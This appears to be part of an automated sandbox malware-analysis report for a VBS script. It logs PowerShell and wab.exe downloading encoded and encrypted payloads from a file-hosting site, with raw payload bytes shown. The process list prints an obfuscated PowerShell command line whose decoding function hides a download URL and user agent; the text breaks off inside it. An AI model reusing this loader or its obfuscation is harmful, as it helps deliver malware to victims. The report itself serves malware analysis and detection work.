User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: www.sendspace.com
Connection: Keep-Alive
2024-05-23 16:25:10 UTC | 943 | IN | HTTP/1.1 301 Moved Permanently
Date: Thu, 23 May 2024 16:25:10 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: SID=39ouo840ocufoic3f1l8aped65; path=/; domain=.sendspace.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: https://fs03n1.sendspace.com/dlpro/85796124f5e308d921827e38e402c0c9/664f6de7/tbfvpd/Parnorpine.java
Vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1672e%2FGRihnxd3hzjl4XsPL1S40plxjibcZOyxK3BMhNSkWuS3Pa2Zq6sVXvcDJf4ihDGAyTWHZs7DxC%2BtINchioqar%2FXziH1fUwvkbKGIGoFrAevqnWpXtIEDFU2QXEq08N%2FA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 88866681dec24308-EWR
alt-svc: h3=":443"; ma=86400
2024-05-23 16:25:10 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.9 | 49707 | 69.31.136.17 | 443 | 7308 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-23 16:25:11 UTC | 234 | OUT | GET /dlpro/85796124f5e308d921827e38e402c0c9/664f6de7/tbfvpd/Parnorpine.java HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: fs03n1.sendspace.com
Connection: Keep-Alive
2024-05-23 16:25:11 UTC | 500 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 23 May 2024 16:25:11 GMT
Content-Type: application/octet-stream
Content-Length: 448940
Last-Modified: Wed, 15 May 2024 07:52:33 GMT
Connection: close
Set-Cookie: SID=ivciuletila01p6s4eq8kblbe6; path=/; domain=.sendspace.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Disposition: attachment;filename="Parnorpine.java"
ETag: "664469c1-6d9ac"
Accept-Ranges: bytes
2024-05-23 16:25:11 UTC | 15884 | IN | Data Raw: 63 51 47 62 36 77 4c 7a 73 72 75 4d 53 78 49 41 36 77 4c 4c 62 4f 73 43 2f 6f 77 44 58 43 51 45 36 77 4c 36 30 33 45 42 6d 37 6c 63 2b 51 48 76 63 51 47 62 63 51 47 62 67 66 45 37 50 50 4e 54 63 51 47 62 63 51 47 62 67 65 6c 6e 78 66 4b 38 36 77 4b 78 4a 48 45 42 6d 33 45 42 6d 2b 73 43 31 7a 4b 36 46 32 58 72 4a 65 73 43 48 76 70 78 41 5a 74 78 41 5a 76 72 41 71 69 76 4d 63 72 72 41 73 6e 56 36 77 4c 62 59 34 6b 55 43 33 45 42 6d 2b 73 43 5a 32 58 52 34 6e 45 42 6d 2b 73 43 74 68 36 44 77 51 54 72 41 67 37 79 36 77 49 58 37 6f 48 35 4e 41 63 69 41 6e 7a 4a 36 77 4c 42 68 58 45 42 6d 34 74 45 4a 41 52 78 41 5a 76 72 41 6c 73 54 69 63 50 72 41 76 68 7a 36 77 4c 6f 44 6f 48 44 50 64 53 66 41 48 45 42 6d 33 45 42 6d 37 71 4b 65 41 49 73 36 77 4a 31 54 58 45
                                                                        Data Ascii: cQGb6wLzsruMSxIA6wLLbOsC/owDXCQE6wL603EBm7lc+QHvcQGbcQGbgfE7PPNTcQGbcQGbgelnxfK86wKxJHEBm3EBm+sC1zK6F2XrJesCHvpxAZtxAZvrAqivMcrrAsnV6wLbY4kUC3EBm+sCZ2XR4nEBm+sCth6DwQTrAg7y6wIX7oH5NAciAnzJ6wLBhXEBm4tEJARxAZvrAlsTicPrAvhz6wLoDoHDPdSfAHEBm3EBm7qKeAIs6wJ1TXE
2024-05-23 16:25:11 UTC | 16384 | IN | Data Raw: 54 52 4b 6d 7a 50 64 42 75 4e 68 44 30 7a 68 2f 54 51 70 57 52 48 4a 7a 75 4e 6a 55 2b 34 70 63 52 65 6f 4b 45 4e 59 48 52 54 68 69 4d 78 56 30 59 74 38 5a 6e 39 45 35 52 72 67 58 56 48 6b 35 4d 51 36 41 4e 73 49 44 70 4f 48 6c 73 63 65 6f 57 32 52 31 59 64 45 77 44 58 64 6d 34 4f 76 56 4b 71 4c 31 49 38 6d 4b 56 76 62 6a 4f 30 65 2f 55 4e 31 47 61 37 32 39 45 41 5a 6b 30 4d 34 5a 66 59 56 61 4b 35 58 54 41 67 57 63 38 7a 6e 75 6a 66 77 35 4e 73 7a 38 4f 54 62 4d 2f 44 6b 32 7a 50 77 35 4e 73 7a 38 4f 54 62 4d 2f 44 6b 32 33 55 43 5a 53 6b 68 33 76 48 7a 4f 2f 44 6c 6d 64 48 45 56 44 63 4c 52 4e 32 32 31 38 67 78 77 56 6f 71 7a 4d 34 49 46 75 2f 4c 35 65 33 77 4d 39 71 75 6c 76 79 76 39 50 71 76 31 4d 30 59 77 69 31 64 41 41 59 41 36 39 75 55 5a 78 37 53
                                                                        Data Ascii: TRKmzPdBuNhD0zh/TQpWRHJzuNjU+4pcReoKENYHRThiMxV0Yt8Zn9E5RrgXVHk5MQ6ANsIDpOHlsceoW2R1YdEwDXdm4OvVKqL1I8mKVvbjO0e/UN1Ga729EAZk0M4ZfYVaK5XTAgWc8znujfw5Nsz8OTbM/Dk2zPw5Nsz8OTbM/Dk23UCZSkh3vHzO/DlmdHEVDcLRN2218gxwVoqzM4IFu/L5e3wM9qulvyv9Pqv1M0Ywi1dAAYA69uUZx7S
2024-05-23 16:25:12 UTC | 16384 | IN | Data Raw: 52 33 45 71 4e 4d 7a 38 61 59 35 57 70 35 73 49 34 55 6f 43 65 75 6e 52 33 53 69 61 35 57 71 71 52 52 38 77 4e 56 46 35 34 6b 37 49 77 34 68 39 5a 4e 63 72 4c 58 5a 67 79 42 67 5a 79 6b 73 4a 58 69 78 79 78 58 4d 61 4e 47 58 73 4c 78 63 4f 72 64 31 71 6a 65 37 38 4f 54 5a 4e 42 30 7a 68 51 50 63 32 75 2b 4f 36 50 54 61 58 70 37 6e 4e 63 71 53 34 38 54 50 38 4f 54 5a 46 65 64 77 33 7a 50 79 77 7a 70 31 46 74 68 69 79 68 72 6a 66 4d 65 76 69 65 45 30 4e 30 4c 78 36 64 37 6a 48 72 64 73 73 6c 6b 58 31 61 75 62 49 70 70 7a 68 49 54 69 65 44 31 70 56 65 65 49 63 49 6a 77 35 4d 49 51 79 36 64 74 41 4e 79 72 75 72 79 36 48 78 6e 75 52 43 58 2f 5a 76 31 53 49 62 47 49 6e 5a 61 56 70 76 55 6b 5a 4f 44 62 4d 71 6f 63 6b 6e 4a 55 47 74 79 49 4b 51 61 4c 33 66 64 63
                                                                        Data Ascii: R3EqNMz8aY5Wp5sI4UoCeunR3Sia5WqqRR8wNVF54k7Iw4h9ZNcrLXZgyBgZyksJXixyxXMaNGXsLxcOrd1qje78OTZNB0zhQPc2u+O6PTaXp7nNcqS48TP8OTZFedw3zPywzp1FthiyhrjfMevieE0N0Lx6d7jHrdsslkX1aubIppzhITieD1pVeeIcIjw5MIQy6dtANyrury6HxnuRCX/Zv1SIbGInZaVpvUkZODbMqocknJUGtyIKQaL3fdc
2024-05-23 16:25:12 UTC | 16384 | IN | Data Raw: 72 57 4f 43 74 6a 50 4d 61 59 37 2b 45 34 64 46 79 52 73 31 71 44 66 52 49 4d 32 51 6b 32 75 71 52 52 34 77 4e 46 48 45 36 55 58 48 5a 44 59 72 6e 31 37 56 49 66 73 47 4f 4f 6b 58 4c 56 50 58 38 44 39 61 36 55 36 4e 76 75 50 6e 6b 69 6a 54 79 4d 4a 6b 44 77 53 6d 58 37 4d 50 70 4c 61 7a 75 50 30 35 4e 6a 2f 7a 2f 67 62 4d 2f 44 6b 32 7a 50 77 35 4e 73 7a 38 4f 54 62 4d 2f 44 6b 32 7a 50 77 35 4e 73 7a 38 4f 54 53 52 38 77 4d 63 42 6d 53 5a 78 2b 6f 59 35 66 6f 7a 67 5a 4a 41 69 2b 30 35 30 36 64 6d 65 39 35 75 45 44 6b 32 6e 45 52 35 6e 55 6c 51 44 4d 6a 46 73 68 45 44 69 78 77 66 6a 66 6e 56 44 33 6b 50 30 65 6c 46 62 67 42 71 71 6b 55 66 4f 44 56 52 65 4f 74 49 30 4b 48 74 34 6f 53 36 42 31 75 5a 6b 54 42 53 59 32 4e 38 73 6a 4e 61 4d 43 4e 64 2f 52 53
                                                                        Data Ascii: rWOCtjPMaY7+E4dFyRs1qDfRIM2Qk2uqRR4wNFHE6UXHZDYrn17VIfsGOOkXLVPX8D9a6U6NvuPnkijTyMJkDwSmX7MPpLazuP05Nj/z/gbM/Dk2zPw5Nsz8OTbM/Dk2zPw5Nsz8OTSR8wMcBmSZx+oY5fozgZJAi+0506dme95uEDk2nER5nUlQDMjFshEDixwfjfnVD3kP0elFbgBqqkUfODVReOtI0KHt4oS6B1uZkTBSY2N8sjNaMCNd/RS
2024-05-23 16:25:12 UTC | 16384 | IN | Data Raw: 48 65 33 66 34 49 4d 34 54 56 4d 31 76 66 73 68 47 4e 49 30 36 6c 48 4f 66 76 48 47 47 51 44 33 6c 5a 6f 41 39 5a 4f 74 67 50 47 32 6c 45 4b 33 4a 61 31 73 59 61 42 39 79 47 63 79 41 71 75 33 50 64 76 6a 32 56 47 71 70 62 38 71 2f 54 65 72 39 53 56 43 4f 36 5a 30 6e 37 41 76 67 4b 35 64 6f 51 77 45 30 59 33 57 41 48 6e 33 41 66 6c 49 77 41 57 48 71 57 76 6b 76 74 74 52 73 4f 7a 68 36 76 65 45 79 32 33 6d 38 37 65 78 69 43 4b 2f 7a 50 78 47 50 70 49 4c 2b 6d 36 39 46 41 52 76 77 2f 33 4f 41 73 7a 38 4f 54 62 4d 2f 44 6b 32 7a 50 77 35 4e 73 7a 38 4f 54 62 4d 2f 44 6b 32 7a 50 77 35 4e 73 34 71 34 7a 64 4e 49 4c 78 6b 6e 44 42 57 53 63 32 37 64 57 4f 50 70 5a 45 55 50 6e 57 38 34 38 33 38 4f 57 52 32 77 32 57 4f 79 6e 33 37 46 56 47 2f 31 4c 63 6d 6b 4f 2f
                                                                        Data Ascii: He3f4IM4TVM1vfshGNI06lHOfvHGGQD3lZoA9ZOtgPG2lEK3Ja1sYaB9yGcyAqu3Pdvj2VGqpb8q/Ter9SVCO6Z0n7AvgK5doQwE0Y3WAHn3AflIwAWHqWvkvttRsOzh6veEy23m87exiCK/zPxGPpIL+m69FARvw/3OAsz8OTbM/Dk2zPw5Nsz8OTbM/Dk2zPw5Ns4q4zdNILxknDBWSc27dWOPpZEUPnW84838OWR2w2WOyn37FVG/1LcmkO/
2024-05-23 16:25:12 UTC | 16384 | IN | Data Raw: 7a 76 77 35 51 7a 75 39 2f 6a 64 53 52 30 4c 51 54 63 33 32 65 39 57 37 41 66 31 4e 7a 63 51 41 42 30 32 34 48 31 6a 61 32 53 78 4a 4e 56 2b 33 4d 36 65 73 38 55 6b 47 4f 44 62 4d 58 7a 51 64 72 6e 32 38 7a 4d 33 38 4f 5a 31 70 68 63 4f 33 65 51 59 34 4e 73 79 65 6b 72 4f 35 6d 72 6a 4d 59 32 43 34 6d 7a 62 39 4f 54 62 6c 35 42 67 66 71 6e 6e 6f 64 7a 4e 78 77 7a 66 4d 2f 45 7a 42 6a 54 73 34 50 67 34 55 51 62 4d 4f 66 54 69 57 48 33 4b 4b 6e 32 56 53 4e 6e 70 4e 7a 62 6d 70 65 70 78 66 77 51 71 5a 34 72 66 39 2b 74 45 75 70 6e 6a 55 73 78 59 37 76 4d 44 4e 2f 44 6d 39 36 4b 48 71 44 78 39 39 6a 4d 44 4e 2f 44 6d 57 66 52 74 4c 74 30 6b 4b 4f 44 62 4d 46 53 66 4e 78 33 32 4d 77 4d 33 38 4f 53 46 34 53 5a 52 33 4d 33 48 50 4e 38 7a 38 54 4d 47 71 65 66 74
                                                                        Data Ascii: zvw5Qzu9/jdSR0LQTc32e9W7Af1NzcQAB024H1ja2SxJNV+3M6es8UkGODbMXzQdrn28zM38OZ1phcO3eQY4NsyekrO5mrjMY2C4mzb9OTbl5BgfqnnodzNxwzfM/EzBjTs4Pg4UQbMOfTiWH3KKn2VSNnpNzbmpepxfwQqZ4rf9+tEupnjUsxY7vMDN/Dm96KHqDx99jMDN/DmWfRtLt0kKODbMFSfNx32MwM38OSF4SZR3M3HPN8z8TMGqeft
2024-05-23 16:25:12 UTC | 16384 | IN | Data Raw: 42 77 4f 73 68 73 7a 38 4f 51 38 45 64 61 51 41 7a 76 77 35 44 69 4a 48 37 64 6e 50 75 37 6a 46 6a 34 43 56 46 50 51 6b 76 4f 56 4e 46 31 64 59 72 35 2b 34 78 65 58 5a 64 54 54 31 4a 4c 4b 72 2b 76 34 35 4e 73 4e 34 57 44 66 4d 2f 47 47 79 4f 48 57 73 6a 4d 33 38 4f 62 32 59 32 44 57 31 4e 76 32 79 6f 33 62 39 4f 54 61 34 31 37 68 4c 73 46 50 74 4e 73 7a 7a 74 4e 4e 48 41 38 61 2f 55 57 6f 34 4e 73 78 31 2b 67 34 55 72 38 2f 30 52 58 65 6b 6f 4d 33 38 4f 63 6d 35 71 4e 45 79 53 76 38 35 73 6a 70 35 36 37 39 5a 66 54 67 32 7a 48 33 47 6c 58 64 2f 55 72 32 59 32 43 6d 33 4e 73 55 38 4e 73 78 33 72 4c 66 4e 2f 44 6b 35 53 43 6f 35 4e 73 78 38 77 2f 42 48 69 42 30 79 52 58 6c 39 4e 4d 7a 38 67 51 79 64 64 56 4d 44 71 33 4f 54 30 66 6e 43 34 4a 4a 39 79 56 73
                                                                        Data Ascii: BwOshsz8OQ8EdaQAzvw5DiJH7dnPu7jFj4CVFPQkvOVNF1dYr5+4xeXZdTT1JLKr+v45NsN4WDfM/GGyOHWsjM38Ob2Y2DW1Nv2yo3b9OTa417hLsFPtNszztNNHA8a/UWo4Nsx1+g4Ur8/0RXekoM38Ocm5qNEySv85sjp5679ZfTg2zH3GlXd/Ur2Y2Cm3NsU8Nsx3rLfN/Dk5SCo5Nsx8w/BHiB0yRXl9NMz8gQyddVMDq3OT0fnC4JJ9yVs
2024-05-23 16:25:12 UTC | 16384 | IN | Data Raw: 4f 2f 30 35 4e 6b 64 37 4f 54 37 4d 2f 4c 43 7a 4e 50 77 35 4e 70 70 43 74 50 57 2b 7a 4c 6a 77 62 37 61 63 77 6b 30 4b 43 54 6e 55 32 57 75 71 52 52 34 34 42 46 48 45 36 6b 72 76 31 35 4a 37 6a 42 52 49 42 70 64 6c 33 39 73 51 77 78 44 6e 74 6b 36 62 2f 38 4e 75 47 67 64 66 68 79 62 31 4d 54 2b 4e 66 66 44 43 63 68 5a 6c 38 4f 57 56 6e 39 45 51 4f 79 35 39 77 31 6c 61 43 46 35 73 71 67 76 34 2f 66 4f 69 73 6e 44 41 2f 62 7a 4f 7a 50 77 35 76 79 54 35 77 54 62 4d 2f 4c 43 4c 37 50 34 35 4e 6b 55 37 61 49 39 70 77 6b 38 48 54 54 31 58 57 4a 62 2f 75 50 66 4b 78 77 6e 39 52 65 58 6a 48 2b 65 59 33 34 65 67 4b 45 46 58 6e 57 5a 68 6f 6b 4b 30 4b 4a 4f 71 72 6a 4a 6d 54 6b 67 64 4d 6e 52 61 78 73 5a 73 2b 56 65 39 46 7a 74 48 77 39 75 6d 48 42 6e 58 52 69 6a
                                                                        Data Ascii: O/05Nkd7OT7M/LCzNPw5NppCtPW+zLjwb7acwk0KCTnU2WuqRR44BFHE6krv15J7jBRIBpdl39sQwxDntk6b/8NuGgdfhyb1MT+NffDCchZl8OWVn9EQOy59w1laCF5sqgv4/fOisnDA/bzOzPw5vyT5wTbM/LCL7P45NkU7aI9pwk8HTT1XWJb/uPfKxwn9ReXjH+eY34egKEFXnWZhokK0KJOqrjJmTkgdMnRaxsZs+Ve9FztHw9umHBnXRij
2024-05-23 16:25:12 UTC | 16384 | IN | Data Raw: 53 42 6d 34 33 43 74 35 36 7a 4e 4e 50 74 71 7a 48 76 6d 79 43 74 30 37 76 4b 76 4e 2f 44 6c 35 78 37 78 63 74 32 46 68 4f 44 62 4d 54 35 58 37 35 71 71 48 43 4a 2f 79 53 37 55 79 33 7a 61 34 68 39 6f 36 4e 70 4a 39 6a 4b 76 4e 2f 44 6d 48 48 6c 75 46 74 30 6c 68 4f 44 62 4d 4b 6b 6f 63 74 62 37 47 75 31 48 39 4f 54 61 35 43 33 75 33 4e 32 34 30 7a 4f 72 48 52 52 4c 49 38 37 78 39 4d 77 50 47 44 68 56 31 70 49 4c 4e 2f 44 6d 2f 44 36 2b 79 71 33 6a 39 4f 54 61 71 65 66 6d 2f 55 51 77 34 4e 73 78 31 38 6d 55 37 4f 33 6c 51 72 2f 47 79 71 7a 7a 39 4f 54 5a 46 63 56 4d 30 7a 50 79 77 35 35 32 61 41 4f 64 48 63 56 4d 30 7a 50 79 77 35 73 30 30 73 4c 73 58 2f 54 6b 32 53 44 36 77 39 35 31 33 74 4f 33 4e 2f 44 6d 32 4e 76 58 52 48 4f 4c 2f 4f 62 64 78 55 44 6b
                                                                        Data Ascii: SBm43Ct56zNNPtqzHvmyCt07vKvN/Dl5x7xct2FhODbMT5X75qqHCJ/yS7Uy3za4h9o6NpJ9jKvN/DmHHluFt0lhODbMKkoctb7Gu1H9OTa5C3u3N240zOrHRRLI87x9MwPGDhV1pILN/Dm/D6+yq3j9OTaqefm/UQw4Nsx18mU7O3lQr/Gyqzz9OTZFcVM0zPyw552aAOdHcVM0zPyw5s00sLsX/Tk2SD6w9513tO3N/Dm2NvXRHOL/ObdxUDk
2024-05-23 16:25:12 UTC | 16384 | IN | Data Raw: 4c 6e 42 70 70 6b 53 55 47 64 30 78 61 69 7a 34 55 31 77 32 4c 69 4f 7a 39 6d 68 4e 46 55 68 69 6f 32 79 34 33 2f 51 52 49 4d 50 44 2f 43 6a 4b 7a 50 77 35 4e 73 7a 38 4f 54 62 4d 2f 44 6b 32 7a 50 77 35 4e 73 7a 38 4f 54 62 4d 2f 44 6b 6e 58 49 62 4e 37 2f 56 78 50 54 66 4d 2f 4c 4b 37 48 2f 30 35 4e 73 4e 34 36 42 2f 4d 2f 46 48 76 67 76 37 78 74 2b 44 59 33 2b 7a 4b 47 54 62 78 39 66 49 35 4e 73 7a 38 4f 54 62 4d 2f 44 6b 32 7a 50 77 35 4e 73 7a 38 4f 54 62 4d 2f 44 6b 32 7a 4f 6f 63 54 70 55 43 61 67 35 7a 72 42 5a 78 5a 58 30 4e 45 71 67 56 63 36 52 4e 2b 42 31 62 71 62 4b 32 76 30 6c 43 4f 44 62 4d 4d 4a 36 6f 6f 4d 4a 6b 35 2f 46 38 54 76 32 61 48 38 6f 33 39 34 77 73 58 63 4e 6d 47 62 44 33 59 58 52 41 7a 58 6f 4b 77 5a 44 55 61 46 68 76 6c 78 2b
                                                                        Data Ascii: LnBppkSUGd0xaiz4U1w2LiOz9mhNFUhio2y43/QRIMPD/CjKzPw5Nsz8OTbM/Dk2zPw5Nsz8OTbM/DknXIbN7/VxPTfM/LK7H/05NsN46B/M/FHvgv7xt+DY3+zKGTbx9fI5Nsz8OTbM/Dk2zPw5Nsz8OTbM/Dk2zOocTpUCag5zrBZxZX0NEqgVc6RN+B1bqbK2v0lCODbMMJ6ooMJk5/F8Tv2aH8o394wsXcNmGbD3YXRAzXoKwZDUaFhvlx+


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.9 | 49710 | 172.67.170.105 | 443 | 8060 | C:\Program Files (x86)\Windows Mail\wab.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-23 16:25:54 UTC | 175 | OUT | GET /pro/dl/dy1f16 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: www.sendspace.com
Cache-Control: no-cache
2024-05-23 16:25:54 UTC | 944 | IN | HTTP/1.1 301 Moved Permanently
Date: Thu, 23 May 2024 16:25:54 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: SID=asnkose8meuts76a32vtsvb0k7; path=/; domain=.sendspace.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: https://fs13n5.sendspace.com/dlpro/44141c5e47f518aa141f08f91a6c6e36/664f6e12/dy1f16/yBKPKDHbe243.bin
Vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dv%2FzfcDg9TXLGkpQqUa7E%2BjYkEyVjIrtY%2BTnVPAVTqMkppjEnn7lDu6JF2eiwVVtyscA4%2FJt6pUBW1Vuh8UigywViec21mklMSM6rZlBwAFQkYoB1EAka6yjXM6SGwKvXa0zbA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 88866794b8cf42b2-EWR
alt-svc: h3=":443"; ma=86400
2024-05-23 16:25:54 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.9 | 49711 | 69.31.136.57 | 443 | 8060 | C:\Program Files (x86)\Windows Mail\wab.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-23 16:25:55 UTC | 300 | OUT | GET /dlpro/44141c5e47f518aa141f08f91a6c6e36/664f6e12/dy1f16/yBKPKDHbe243.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Cache-Control: no-cache
Host: fs13n5.sendspace.com
Connection: Keep-Alive
Cookie: SID=asnkose8meuts76a32vtsvb0k7
2024-05-23 16:25:56 UTC | 424 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 23 May 2024 16:25:55 GMT
Content-Type: application/octet-stream
Content-Length: 34368
Last-Modified: Wed, 15 May 2024 07:50:57 GMT
Connection: close
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Disposition: attachment;filename="yBKPKDHbe243.bin"
ETag: "66446961-8640"
Accept-Ranges: bytes
2024-05-23 16:25:56 UTC | 15960 | IN | Data Raw: fc b1 f6 cf 04 0c 6c 69 9c 25 fd a1 7a cd 45 a4 6f 81 0a 6d 57 1c 0d a8 37 99 86 1a c2 51 63 cd 40 b4 50 a6 6b a4 c7 bb 48 7c 71 e5 e7 6b 80 ce c7 6e be 2e 86 87 0c e8 55 53 33 06 45 71 90 e3 94 c9 dd 7f 9a 4b 32 99 96 e1 17 1f 2d 5b e2 c6 ef 8d e4 2f 74 41 08 96 25 bc ed 85 a4 c8 06 d3 dd fc 7d 4a 97 de 02 5b 9b 9d 6c 91 ea c0 79 20 29 45 82 98 bb 42 5b 5f b2 83 6b 76 84 f9 bd 0c b8 29 20 33 5a 20 17 38 03 8c f4 90 dc c5 55 72 0c f0 58 1a 64 62 19 5a 40 4d 8d 2b 0e 56 64 40 60 7c 60 7d 55 b8 b5 40 6c 31 57 e4 cb 64 35 26 e7 ab 61 9c dd 92 78 b7 23 83 38 e2 5e 11 63 0a f1 15 a2 f7 f3 69 b3 4c 76 11 bc d1 7c 65 85 1e 6a b7 29 65 63 48 ae fb d7 e3 cc 5a 2f 02 13 84 e2 36 2e 67 43 96 29 6a 5e 48 08 55 09 86 dd 85 e7 fc d4 c6 dd d9 7c b2 30 41 f6 50 cf fc 35
                                                                        Data Ascii: li%zEomW7Qc@PkH|qkn.US3EqK2-[/tA%}J[ly )EB[_kv) 3Z 8UrXdbZ@M+Vd@`|`}U@l1Wd5&ax#8^ciLv|ej)ecHZ/6.gC)j^HU|0AP5
2024-05-23 16:25:56 UTC | 16384 | IN | Data Raw: ba 46 e5 0a 02 1b 24 42 3f e4 2f fd 22 ac 4c 22 52 cd 47 b6 6a fb a0 33 2e f5 06 e9 0c d9 90 4d 39 9a 1c 3b 39 91 87 17 1f d2 a4 e2 c5 57 cb e7 5a 7d 52 08 f1 65 30 d2 85 a4 c8 06 d5 c5 ca 7c 59 97 b9 02 9f a5 9d 6c 91 ea c6 71 c3 39 56 82 ff bb 42 5b 5e b2 b1 69 76 04 f8 bd 67 b4 36 9a 3c 5a ff 1c f5 22 35 f5 04 12 e4 01 1b 65 66 7b 6a 16 0c 7e c4 22 20 ad 49 6f e0 09 2f 14 5d 02 35 78 ca c0 2f 4c 75 34 c4 8f 2a 66 e3 89 c4 05 f8 f3 bf 71 bd 07 82 38 0e 5d 11 63 0b a1 bc a1 f7 bf 69 b0 1c b5 69 ce b5 7c 04 81 1e 6a b6 29 0b 87 48 ac f8 dc 90 c3 5a 2f 7f 13 15 e6 3e 2e 65 43 36 2d 6a b0 d0 08 fd 0d a6 dd 81 e7 f6 d0 c6 dd dc 3c 1e 34 61 f6 56 cf 4d 31 3c a8 e6 e9 12 eb 45 14 f8 51 8c 92 23 41 73 96 af 7f b7 c7 3d 5d 77 83 83 0d 3a a0 59 3a a2 de 2a 85 a4
                                                                        Data Ascii: F$B?/"L"RGj3.M9;9WZ}Re0|Ylq9VB[^ivg6<Z"5ef{j~" Io/]5x/Lu4*fq8]cii|j)HZ/>.eC6-j<4aVM1<EQ#As=]w:Y:*
2024-05-23 16:25:56 UTC | 2024 | IN | Data Raw: 23 df 48 86 68 68 ad 24 87 8d 02 80 2e 3f 68 07 64 88 ed 75 d4 fb 21 63 de 6b 11 90 bf 1c e4 8c 64 5e 52 e0 9a c7 d6 96 68 a3 ae 4d 93 10 18 22 c0 03 d0 e8 6e dc f9 d1 3d aa c1 e7 86 98 fd 13 9b 33 85 a5 6c b7 e1 ae 30 28 f2 2b 39 b9 74 03 d5 d4 48 c8 24 ac 63 88 86 db ca e1 22 88 56 b8 1e 01 78 3a 4e 35 e5 8f 64 9a a2 3e 4c f5 db fe f6 bc 02 1c a6 af c8 22 ce ee 70 fb fb f0 e7 85 8a b4 76 9c 9e 5e 32 e6 4e bd 0c 1f 03 8c 42 5e a9 47 10 14 27 c6 fe 39 78 ab 66 92 bd 86 c0 27 22 ae a4 98 33 b5 44 52 ef 9b 81 d7 c1 98 07 ad 0d 56 62 5f 4b 09 50 6e 9d d3 7f a3 81 e4 1b f5 db ad 8b b8 96 c5 aa f7 37 b6 b0 a4 3a 22 b3 18 30 b3 ab 5c 7f 6f 20 2a 65 b2 c0 c2 aa 27 4e df f4 d3 ad 3c 7b 55 80 79 ab 71 5e d8 7e 6d ee 66 54 23 3e 6f 18 71 65 81 52 d1 81 c6 9d c2 12
                                                                        Data Ascii: #Hhh$.?hdu!ckd^RhM"n=3l0(+9tH$c"Vx:N5d>L"pv^2NB^G'9xf'"3DRVb_KPn7:"0\o *e'N<{Uyq^~mfT#>oqeR


Target ID: 2
Start time: 12:25:00
Start date: 23/05/2024
Path: C:\Windows\System32\wscript.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\windows.vbs"
Imagebase: 0x7ff63b890000
File size: 170'496 bytes
MD5 hash: A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 9
Start time: 12:25:07
Start date: 23/05/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Coddle = 1;$Pararctalia='Su';$Pararctalia+='bstrin';$Pararctalia+='g';Function Tilsynsraads($Paradoxer){$Afprver=$Paradoxer.Length-$Coddle;For($Publikummer=5;$Publikummer -lt $Afprver;$Publikummer+=6){$Printerdefinitionerne+=$Paradoxer.$Pararctalia.Invoke( $Publikummer, $Coddle);}$Printerdefinitionerne;}function Handelsmssiges($Overimaginatively){& ($Nondiligently106) ($Overimaginatively);}$Toniskes=Tilsynsraads 'Mana,MWeddioFell,zUncomi C.pilNonbelstanga Ripo/Stakn5Forho.Mythi0 Unde Nonvo( DispW StaniEarthnU.vetdBrystoOutbiwUnives pakk Kirj.N eratTunst. Revo1Remit0tamgs.Brde.0 Rust;Tanch .onomWAntiriSansenomdri6Rip n4Lilje;M als AlloxDoxyc6Folkl4 marg;Oxa,i AmararGaskovRock,:Smile1Eleus2S.xte1recli. ,ndr0Ge.er)Henst BarbaGoutluegadsbcKindlkBumpio .lab/Capit2Vo.dt0Lenda1 She,0 Bus 0 her1Bes,y0Synge1Contr R.stiFDukkeiF.rberslingeEkspafEnteroImprexD,maj/Ureal1Lever2Polyp1 Micr. .gat0Buhko ';$Mellite=Tilsynsraads ' CranU Skams Txthe b rkrS.iff-PrenoALe.sigAlkohe VelsnMi.sitVoice ';$Overmuch=Tilsynsraads 'CurnehGemmitSievetRor.ypFr.bisE,xli:Lealn/Cara /T.ldfwTelotw E fawDamno.,orsmsKubepeTrkkrnUncubdNonlus verip SaloaInobtcAfleveSanda.Di.crc Syllo 